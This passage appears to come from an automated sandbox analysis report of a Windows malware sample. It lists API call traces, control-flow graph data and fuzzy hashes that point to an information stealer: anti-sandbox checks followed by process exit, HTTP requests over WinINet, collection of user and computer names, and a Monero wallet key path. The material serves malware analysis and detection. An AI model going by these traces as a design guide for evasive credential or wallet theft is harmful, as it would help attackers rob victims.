                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 460715078-2180234286
                          • Opcode ID: 4bb2de15b0af3fa0947aa4eb446b756ca6d29fb40c5a8484a9eb392cc15fa061
                          • Instruction ID: d84c0baffae66be4f656ee28471622af22679b79347164ede6d91a3f492fb299
                          • Opcode Fuzzy Hash: 4bb2de15b0af3fa0947aa4eb446b756ca6d29fb40c5a8484a9eb392cc15fa061
                          • Instruction Fuzzy Hash: 3812CB71911528ABDB55EB90EC92FEEB37ABF14300F50419DF10662091DFB42B89CF6A
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006111B7), ref: 00627880
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00627887
                          • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0062789F
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateNameProcessUser
                          • String ID:
                          • API String ID: 1296208442-0
                          • Opcode ID: db9f1f14a16421bcaa6900738c6a252eac1f21d8a7e2519a1818b05ee3f14c17
                          • Instruction ID: 89374b62ef015448b8c090ecd0bcd8bd38eb83b657b2c25f367743ba3a60c772
                          • Opcode Fuzzy Hash: db9f1f14a16421bcaa6900738c6a252eac1f21d8a7e2519a1818b05ee3f14c17
                          • Instruction Fuzzy Hash: 77F04FB1944608ABC704DF98DD89FAEBBB8FB08712F10026AFA05A2680C77915048BA1
                          APIs
                          Yara matches
                          Similarity
                          • API ID: ExitInfoProcessSystem
                          • String ID:
                          • API String ID: 752954902-0
                          • Opcode ID: c8ddb5406c0630bb2d6bd2bcb38e3398ebb16bc91e5507f82a05baf08813f33c
                          • Instruction ID: 6a8da9df64c22bd79732b9d476085bf6afd6ffe54305fa6836755fc949ca83ea
                          • Opcode Fuzzy Hash: c8ddb5406c0630bb2d6bd2bcb38e3398ebb16bc91e5507f82a05baf08813f33c
                          • Instruction Fuzzy Hash: E8D05E7490030CDBCB04DFE0D88A6DDBB78FB0C312F000698D90562340EA306485CAA6

                          Control-flow Graph (graph rendering omitted)
                          APIs
                          • GetProcAddress.KERNEL32(74DD0000,01105850), ref: 00629C2D
                          • GetProcAddress.KERNEL32(74DD0000,011056D0), ref: 00629C45
                          • GetProcAddress.KERNEL32(74DD0000,01119670), ref: 00629C5E
                          • GetProcAddress.KERNEL32(74DD0000,01119688), ref: 00629C76
                          • GetProcAddress.KERNEL32(74DD0000,011196D0), ref: 00629C8E
                          • GetProcAddress.KERNEL32(74DD0000,01119610), ref: 00629CA7
                          • GetProcAddress.KERNEL32(74DD0000,0110BD10), ref: 00629CBF
                          • GetProcAddress.KERNEL32(74DD0000,0111D4D0), ref: 00629CD7
                          • GetProcAddress.KERNEL32(74DD0000,0111D4B8), ref: 00629CF0
                          • GetProcAddress.KERNEL32(74DD0000,0111D5A8), ref: 00629D08
                          • GetProcAddress.KERNEL32(74DD0000,0111D578), ref: 00629D20
                          • GetProcAddress.KERNEL32(74DD0000,01105870), ref: 00629D39
                          • GetProcAddress.KERNEL32(74DD0000,011056B0), ref: 00629D51
                          • GetProcAddress.KERNEL32(74DD0000,011058B0), ref: 00629D69
                          • GetProcAddress.KERNEL32(74DD0000,01105890), ref: 00629D82
                          • GetProcAddress.KERNEL32(74DD0000,0111D488), ref: 00629D9A
                          • GetProcAddress.KERNEL32(74DD0000,0111D4E8), ref: 00629DB2
                          • GetProcAddress.KERNEL32(74DD0000,0110BCC0), ref: 00629DCB
                          • GetProcAddress.KERNEL32(74DD0000,011058D0), ref: 00629DE3
                          • GetProcAddress.KERNEL32(74DD0000,0111D500), ref: 00629DFB
                          • GetProcAddress.KERNEL32(74DD0000,0111D518), ref: 00629E14
                          • GetProcAddress.KERNEL32(74DD0000,0111D530), ref: 00629E2C
                          • GetProcAddress.KERNEL32(74DD0000,0111D560), ref: 00629E44
                          • GetProcAddress.KERNEL32(74DD0000,011059D0), ref: 00629E5D
                          • GetProcAddress.KERNEL32(74DD0000,0111D4A0), ref: 00629E75
                          • GetProcAddress.KERNEL32(74DD0000,0111D590), ref: 00629E8D
                          • GetProcAddress.KERNEL32(74DD0000,0111D3F8), ref: 00629EA6
                          • GetProcAddress.KERNEL32(74DD0000,0111D440), ref: 00629EBE
                          • GetProcAddress.KERNEL32(74DD0000,0111D410), ref: 00629ED6
                          • GetProcAddress.KERNEL32(74DD0000,0111D548), ref: 00629EEF
                          • GetProcAddress.KERNEL32(74DD0000,0111D428), ref: 00629F07
                          • GetProcAddress.KERNEL32(74DD0000,0111D458), ref: 00629F1F
                          • GetProcAddress.KERNEL32(74DD0000,0111D470), ref: 00629F38
                          • GetProcAddress.KERNEL32(74DD0000,0111A660), ref: 00629F50
                          • GetProcAddress.KERNEL32(74DD0000,0111CE28), ref: 00629F68
                          • GetProcAddress.KERNEL32(74DD0000,0111CE10), ref: 00629F81
                          • GetProcAddress.KERNEL32(74DD0000,011059F0), ref: 00629F99
                          • GetProcAddress.KERNEL32(74DD0000,0111D008), ref: 00629FB1
                          • GetProcAddress.KERNEL32(74DD0000,01105A10), ref: 00629FCA
                          • GetProcAddress.KERNEL32(74DD0000,0111D050), ref: 00629FE2
                          • GetProcAddress.KERNEL32(74DD0000,0111CEE8), ref: 00629FFA
                          • GetProcAddress.KERNEL32(74DD0000,01105A70), ref: 0062A013
                          • GetProcAddress.KERNEL32(74DD0000,01105AB0), ref: 0062A02B
                          • LoadLibraryA.KERNEL32(0111CE58,?,00625CA3,00630AEB,?,?,?,?,?,?,?,?,?,?,00630AEA,00630AE3), ref: 0062A03D
                          • LoadLibraryA.KERNEL32(0111D0E0,?,00625CA3,00630AEB,?,?,?,?,?,?,?,?,?,?,00630AEA,00630AE3), ref: 0062A04E
                          • LoadLibraryA.KERNEL32(0111CEB8,?,00625CA3,00630AEB,?,?,?,?,?,?,?,?,?,?,00630AEA,00630AE3), ref: 0062A060
                          • LoadLibraryA.KERNEL32(0111CF78,?,00625CA3,00630AEB,?,?,?,?,?,?,?,?,?,?,00630AEA,00630AE3), ref: 0062A072
                          • LoadLibraryA.KERNEL32(0111CDF8,?,00625CA3,00630AEB,?,?,?,?,?,?,?,?,?,?,00630AEA,00630AE3), ref: 0062A083
                          • LoadLibraryA.KERNEL32(0111D020,?,00625CA3,00630AEB,?,?,?,?,?,?,?,?,?,?,00630AEA,00630AE3), ref: 0062A095
                          • LoadLibraryA.KERNEL32(0111CE40,?,00625CA3,00630AEB,?,?,?,?,?,?,?,?,?,?,00630AEA,00630AE3), ref: 0062A0A7
                          • LoadLibraryA.KERNEL32(0111D038,?,00625CA3,00630AEB,?,?,?,?,?,?,?,?,?,?,00630AEA,00630AE3), ref: 0062A0B8
                          • GetProcAddress.KERNEL32(75290000,01105B90), ref: 0062A0DA
                          • GetProcAddress.KERNEL32(75290000,0111CE70), ref: 0062A0F2
                          • GetProcAddress.KERNEL32(75290000,01118F78), ref: 0062A10A
                          • GetProcAddress.KERNEL32(75290000,0111CE88), ref: 0062A123
                          • GetProcAddress.KERNEL32(75290000,01105DF0), ref: 0062A13B
                          • GetProcAddress.KERNEL32(73440000,0110B5E0), ref: 0062A160
                          • GetProcAddress.KERNEL32(73440000,01105CD0), ref: 0062A179
                          • GetProcAddress.KERNEL32(73440000,0110B950), ref: 0062A191
                          • GetProcAddress.KERNEL32(73440000,0111CED0), ref: 0062A1A9
                          • GetProcAddress.KERNEL32(73440000,0111CEA0), ref: 0062A1C2
                          • GetProcAddress.KERNEL32(73440000,01105C10), ref: 0062A1DA
                          • GetProcAddress.KERNEL32(73440000,01105AD0), ref: 0062A1F2
                          • GetProcAddress.KERNEL32(73440000,0111CF00), ref: 0062A20B
                          • GetProcAddress.KERNEL32(752C0000,01105DD0), ref: 0062A22C
                          • GetProcAddress.KERNEL32(752C0000,01105C90), ref: 0062A244
                          • GetProcAddress.KERNEL32(752C0000,0111CF18), ref: 0062A25D
                          • GetProcAddress.KERNEL32(752C0000,0111CF90), ref: 0062A275
                          • GetProcAddress.KERNEL32(752C0000,01105C30), ref: 0062A28D
                          • GetProcAddress.KERNEL32(74EC0000,0110B608), ref: 0062A2B3
                          • GetProcAddress.KERNEL32(74EC0000,0110B9C8), ref: 0062A2CB
                          • GetProcAddress.KERNEL32(74EC0000,0111CFA8), ref: 0062A2E3
                          • GetProcAddress.KERNEL32(74EC0000,01105DB0), ref: 0062A2FC
                          • GetProcAddress.KERNEL32(74EC0000,01105D10), ref: 0062A314
                          • GetProcAddress.KERNEL32(74EC0000,0110B978), ref: 0062A32C
                          • GetProcAddress.KERNEL32(75BD0000,0111CFC0), ref: 0062A352
                          • GetProcAddress.KERNEL32(75BD0000,01105AF0), ref: 0062A36A
                          • GetProcAddress.KERNEL32(75BD0000,011190A8), ref: 0062A382
                          • GetProcAddress.KERNEL32(75BD0000,0111D068), ref: 0062A39B
                          • GetProcAddress.KERNEL32(75BD0000,0111CF30), ref: 0062A3B3
                          • GetProcAddress.KERNEL32(75BD0000,01105C50), ref: 0062A3CB
                          • GetProcAddress.KERNEL32(75BD0000,01105BD0), ref: 0062A3E4
                          • GetProcAddress.KERNEL32(75BD0000,0111CFD8), ref: 0062A3FC
                          • GetProcAddress.KERNEL32(75BD0000,0111CF48), ref: 0062A414
                          • GetProcAddress.KERNEL32(75A70000,01105D70), ref: 0062A436
                          • GetProcAddress.KERNEL32(75A70000,0111CF60), ref: 0062A44E
                          • GetProcAddress.KERNEL32(75A70000,0111CFF0), ref: 0062A466
                          • GetProcAddress.KERNEL32(75A70000,0111D080), ref: 0062A47F
                          • GetProcAddress.KERNEL32(75A70000,0111D098), ref: 0062A497
                          • GetProcAddress.KERNEL32(75450000,01105E50), ref: 0062A4B8
                          • GetProcAddress.KERNEL32(75450000,01105B70), ref: 0062A4D1
                          • GetProcAddress.KERNEL32(75DA0000,01105B50), ref: 0062A4F2
                          • GetProcAddress.KERNEL32(75DA0000,0111D0B0), ref: 0062A50A
                          • GetProcAddress.KERNEL32(6F070000,01105D30), ref: 0062A530
                          • GetProcAddress.KERNEL32(6F070000,01105BB0), ref: 0062A548
                          • GetProcAddress.KERNEL32(6F070000,01105B10), ref: 0062A560
                          • GetProcAddress.KERNEL32(6F070000,0111D0C8), ref: 0062A579
                          • GetProcAddress.KERNEL32(6F070000,01105C70), ref: 0062A591
                          • GetProcAddress.KERNEL32(6F070000,01105CB0), ref: 0062A5A9
                          • GetProcAddress.KERNEL32(6F070000,01105B30), ref: 0062A5C2
                          • GetProcAddress.KERNEL32(6F070000,01105BF0), ref: 0062A5DA
                          • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0062A5F1
                          • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0062A607
                          • GetProcAddress.KERNEL32(75AF0000,0111D2C0), ref: 0062A629
                          • GetProcAddress.KERNEL32(75AF0000,01119078), ref: 0062A641
                          • GetProcAddress.KERNEL32(75AF0000,0111D230), ref: 0062A659
                          • GetProcAddress.KERNEL32(75AF0000,0111D338), ref: 0062A672
                          • GetProcAddress.KERNEL32(75D90000,01105E10), ref: 0062A693
                          • GetProcAddress.KERNEL32(6CF60000,0111D2D8), ref: 0062A6B4
                          • GetProcAddress.KERNEL32(6CF60000,01105E30), ref: 0062A6CD
                          • GetProcAddress.KERNEL32(6CF60000,0111D188), ref: 0062A6E5
                          • GetProcAddress.KERNEL32(6CF60000,0111D140), ref: 0062A6FD
                          Strings
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: HttpQueryInfoA$InternetSetOptionA
                          • API String ID: 2238633743-1775429166
                          • Opcode ID: cf85a5db622e2acc2c70c607782b938061109bf42cc29d83c198998d81a5b989
                          • Instruction ID: 373cc11f1038989b8029869cdf792003cd3a3ec482c17bdffb473e4d08f85fdb
                          • Opcode Fuzzy Hash: cf85a5db622e2acc2c70c607782b938061109bf42cc29d83c198998d81a5b989
                          • Instruction Fuzzy Hash: E862F8B5510304AFC74CDFA8EDD89663BF9F78C603714872AA64AC3264D63DA841DF62

                          Control-flow Graph (graph rendering omitted)
                          APIs
                            • Part of subcall function 0062A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0062A7E6
                            • Part of subcall function 006147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00614839
                            • Part of subcall function 006147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00614849
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                          • InternetOpenA.WININET(00630DFE,00000001,00000000,00000000,00000000), ref: 006162E1
                          • StrCmpCA.SHLWAPI(?,0111E858), ref: 00616303
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00616335
                          • HttpOpenRequestA.WININET(00000000,GET,?,0111E2D8,00000000,00000000,00400100,00000000), ref: 00616385
                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006163BF
                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006163D1
                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 006163FD
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0061646D
                          • InternetCloseHandle.WININET(00000000), ref: 006164EF
                          • InternetCloseHandle.WININET(00000000), ref: 006164F9
                          • InternetCloseHandle.WININET(00000000), ref: 00616503
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                          • String ID: ERROR$ERROR$GET
                          • API String ID: 3749127164-2509457195
                          • Opcode ID: 1973aed3da6fd50e9f245778c75a310e9171434b1f0448d2215785e284ee8092
                          • Instruction ID: fc439d3a6641b82505cff4c520b5ec6dd9fe3dc1d86902fdf32f1d8572c27806
                          • Opcode Fuzzy Hash: 1973aed3da6fd50e9f245778c75a310e9171434b1f0448d2215785e284ee8092
                          • Instruction Fuzzy Hash: F6715F75A00318ABDB14DFE0DC99BEE77BABB44701F108198F10A6B1D0DBB46A85CF95

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1090 625510-625577 call 625ad0 call 62a820 * 3 call 62a740 * 4 1106 62557c-625583 1090->1106 1107 6255d7-62564c call 62a740 * 2 call 611590 call 6252c0 call 62a8a0 call 62a800 call 62aad0 StrCmpCA 1106->1107 1108 625585-6255b6 call 62a820 call 62a7a0 call 611590 call 6251f0 1106->1108 1134 625693-6256a9 call 62aad0 StrCmpCA 1107->1134 1138 62564e-62568e call 62a7a0 call 611590 call 6251f0 call 62a8a0 call 62a800 1107->1138 1123 6255bb-6255d2 call 62a8a0 call 62a800 1108->1123 1123->1134 1139 6256af-6256b6 1134->1139 1140 6257dc-625844 call 62a8a0 call 62a820 * 2 call 611670 call 62a800 * 4 call 626560 call 611550 1134->1140 1138->1134 1142 6257da-62585f call 62aad0 StrCmpCA 1139->1142 1143 6256bc-6256c3 1139->1143 1271 625ac3-625ac6 1140->1271 1161 625991-6259f9 call 62a8a0 call 62a820 * 2 call 611670 call 62a800 * 4 call 626560 call 611550 1142->1161 1162 625865-62586c 1142->1162 1146 6256c5-625719 call 62a820 call 62a7a0 call 611590 call 6251f0 call 62a8a0 call 62a800 1143->1146 1147 62571e-625793 call 62a740 * 2 call 611590 call 6252c0 call 62a8a0 call 62a800 call 62aad0 StrCmpCA 1143->1147 1146->1142 1147->1142 1250 625795-6257d5 call 62a7a0 call 611590 call 6251f0 call 62a8a0 call 62a800 1147->1250 1161->1271 1168 625872-625879 1162->1168 1169 62598f-625a14 call 62aad0 StrCmpCA 1162->1169 1175 6258d3-625948 call 62a740 * 2 call 611590 call 6252c0 call 62a8a0 call 62a800 call 62aad0 StrCmpCA 1168->1175 1176 62587b-6258ce call 62a820 call 62a7a0 call 611590 call 6251f0 call 62a8a0 call 62a800 1168->1176 1198 625a16-625a21 Sleep 1169->1198 1199 625a28-625a91 call 62a8a0 call 62a820 * 2 call 611670 call 62a800 * 4 call 626560 call 611550 1169->1199 1175->1169 1274 62594a-62598a call 62a7a0 call 611590 call 6251f0 call 62a8a0 call 62a800 1175->1274 1176->1169 1198->1106 1199->1271 1250->1142 1274->1169
                          APIs
                            • Part of subcall function 0062A820: lstrlen.KERNEL32(00614F05,?,?,00614F05,00630DDE), ref: 0062A82B
                            • Part of subcall function 0062A820: lstrcpy.KERNEL32(00630DDE,00000000), ref: 0062A885
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00625644
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006256A1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00625857
                            • Part of subcall function 0062A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0062A7E6
                            • Part of subcall function 006251F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00625228
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                            • Part of subcall function 006252C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00625318
                            • Part of subcall function 006252C0: lstrlen.KERNEL32(00000000), ref: 0062532F
                            • Part of subcall function 006252C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00625364
                            • Part of subcall function 006252C0: lstrlen.KERNEL32(00000000), ref: 00625383
                            • Part of subcall function 006252C0: lstrlen.KERNEL32(00000000), ref: 006253AE
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0062578B
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00625940
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00625A0C
                          • Sleep.KERNEL32(0000EA60), ref: 00625A1B
                          Strings
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen$Sleep
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 507064821-2791005934
                          • Opcode ID: 52d314e3057db8d4999fa97f4c6e259e50f020682e60a53bfcb6996ccac0f9cb
                          • Instruction ID: b5dd3e5e85718f5bc57bb87ecef09854c135f6dd7141898556707b6f618a2f7c
                          • Opcode Fuzzy Hash: 52d314e3057db8d4999fa97f4c6e259e50f020682e60a53bfcb6996ccac0f9cb
                          • Instruction Fuzzy Hash: 94E11071910A149BCB58FBE0FC969ED733AAF54300F50812CF50766192EF786A49CF9A

                          Control-flow Graph

                          • (Rendered control-flow graph omitted: node/edge data for the function starting at 006217A0, with basic blocks calling StrCmpCA and ExitProcess; executed/not-executed colouring is not recoverable from the extracted text.)
                          APIs
                          • StrCmpCA.SHLWAPI(00000000,block), ref: 006217C5
                          • ExitProcess.KERNEL32 ref: 006217D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: 63e04a3ba553c89866042486a4693119c98102b8b6b68fb1cdd453caa4003eb3
                          • Instruction ID: 93b459f46dbee740c35af74b9dc6fd4eea69708303bc3bafee22c005168e11af
                          • Opcode Fuzzy Hash: 63e04a3ba553c89866042486a4693119c98102b8b6b68fb1cdd453caa4003eb3
                          • Instruction Fuzzy Hash: 4D514EB4A08619EFDB04DFA0E9A4ABE77BBBF55704F108058E4056B340D774E986CF62

                          Control-flow Graph

                          • (Rendered control-flow graph omitted: node/edge data for the function starting at 00627500, with basic blocks calling GetWindowsDirectoryA, GetVolumeInformationA, GetProcessHeap, RtlAllocateHeap and wsprintfA; executed/not-executed colouring is not recoverable from the extracted text.)
                          APIs
                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00627542
                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0062757F
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00627603
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0062760A
                          • wsprintfA.USER32 ref: 00627640
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                          • String ID: :$C$\$c
                          • API String ID: 1544550907-1184480125
                          • Opcode ID: 2750867a588d834e315c2eefb1632ae3ca11489e2d34bcd1cc2167b9f4b6c6b0
                          • Instruction ID: 61aec751c785677a1565b404cf6b125ab26905fbbc768e8ab776fc14773719e2
                          • Opcode Fuzzy Hash: 2750867a588d834e315c2eefb1632ae3ca11489e2d34bcd1cc2167b9f4b6c6b0
                          • Instruction Fuzzy Hash: 204181B1904658ABDB10DB94EC85FDEBBB9AF08701F100198F50967280DB78AA44CFA5

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00629860: GetProcAddress.KERNEL32(74DD0000,01112320), ref: 006298A1
                            • Part of subcall function 00629860: GetProcAddress.KERNEL32(74DD0000,01112338), ref: 006298BA
                            • Part of subcall function 00629860: GetProcAddress.KERNEL32(74DD0000,01112350), ref: 006298D2
                            • Part of subcall function 00629860: GetProcAddress.KERNEL32(74DD0000,01112380), ref: 006298EA
                            • Part of subcall function 00629860: GetProcAddress.KERNEL32(74DD0000,01112428), ref: 00629903
                            • Part of subcall function 00629860: GetProcAddress.KERNEL32(74DD0000,01118F48), ref: 0062991B
                            • Part of subcall function 00629860: GetProcAddress.KERNEL32(74DD0000,01105750), ref: 00629933
                            • Part of subcall function 00629860: GetProcAddress.KERNEL32(74DD0000,01105810), ref: 0062994C
                            • Part of subcall function 00629860: GetProcAddress.KERNEL32(74DD0000,011123C8), ref: 00629964
                            • Part of subcall function 00629860: GetProcAddress.KERNEL32(74DD0000,01112368), ref: 0062997C
                            • Part of subcall function 00629860: GetProcAddress.KERNEL32(74DD0000,011123E0), ref: 00629995
                            • Part of subcall function 00629860: GetProcAddress.KERNEL32(74DD0000,011123F8), ref: 006299AD
                            • Part of subcall function 00629860: GetProcAddress.KERNEL32(74DD0000,01105930), ref: 006299C5
                            • Part of subcall function 00629860: GetProcAddress.KERNEL32(74DD0000,01112410), ref: 006299DE
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                            • Part of subcall function 006111D0: ExitProcess.KERNEL32 ref: 00611211
                            • Part of subcall function 00611160: GetSystemInfo.KERNEL32(?), ref: 0061116A
                            • Part of subcall function 00611160: ExitProcess.KERNEL32 ref: 0061117E
                            • Part of subcall function 00611110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0061112B
                            • Part of subcall function 00611110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00611132
                            • Part of subcall function 00611110: ExitProcess.KERNEL32 ref: 00611143
                            • Part of subcall function 00611220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0061123E
                            • Part of subcall function 00611220: __aulldiv.LIBCMT ref: 00611258
                            • Part of subcall function 00611220: __aulldiv.LIBCMT ref: 00611266
                            • Part of subcall function 00611220: ExitProcess.KERNEL32 ref: 00611294
                            • Part of subcall function 00626770: GetUserDefaultLangID.KERNEL32 ref: 00626774
                            • Part of subcall function 00611190: ExitProcess.KERNEL32 ref: 006111C6
                            • Part of subcall function 00627850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006111B7), ref: 00627880
                            • Part of subcall function 00627850: RtlAllocateHeap.NTDLL(00000000), ref: 00627887
                            • Part of subcall function 00627850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0062789F
                            • Part of subcall function 006278E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00627910
                            • Part of subcall function 006278E0: RtlAllocateHeap.NTDLL(00000000), ref: 00627917
                            • Part of subcall function 006278E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0062792F
                            • Part of subcall function 0062A9B0: lstrlen.KERNEL32(?,01119148,?,\Monero\wallet.keys,00630E17), ref: 0062A9C5
                            • Part of subcall function 0062A9B0: lstrcpy.KERNEL32(00000000), ref: 0062AA04
                            • Part of subcall function 0062A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0062AA12
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01118F08,?,0063110C,?,00000000,?,00631110,?,00000000,00630AEF), ref: 00626ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00626AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00626AF9
                          • Sleep.KERNEL32(00001770), ref: 00626B04
                          • CloseHandle.KERNEL32(?,00000000,?,01118F08,?,0063110C,?,00000000,?,00631110,?,00000000,00630AEF), ref: 00626B1A
                          • ExitProcess.KERNEL32 ref: 00626B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmp
